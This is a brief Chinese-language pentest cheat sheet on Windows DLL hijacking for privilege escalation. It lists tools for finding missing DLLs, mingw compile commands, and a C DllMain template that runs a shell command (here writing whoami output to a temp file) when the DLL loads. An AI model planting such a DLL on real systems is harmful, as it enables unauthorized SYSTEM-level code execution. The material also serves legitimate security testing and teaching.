DLL劫持
以管理员/SYSTEM 身份运行且文件权限不正确的服务可能允许提权。可以替换文件,重新启动服务并获取系统权限。
查找缺少的 DLL
- Find-PathDLLHijack PowerUp.ps1
- Process Monitor : check for "Name Not Found"
编译一个恶意 dll
- For x64 compile with: "x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll"
- For x86 compile with: "i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll"
windows_dll.c的内容
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
if (dwReason == DLL_PROCESS_ATTACH) {
system("cmd.exe /k whoami > C:\\Windows\\Temp\\dll.txt");
ExitProcess(0);
}
return TRUE;
}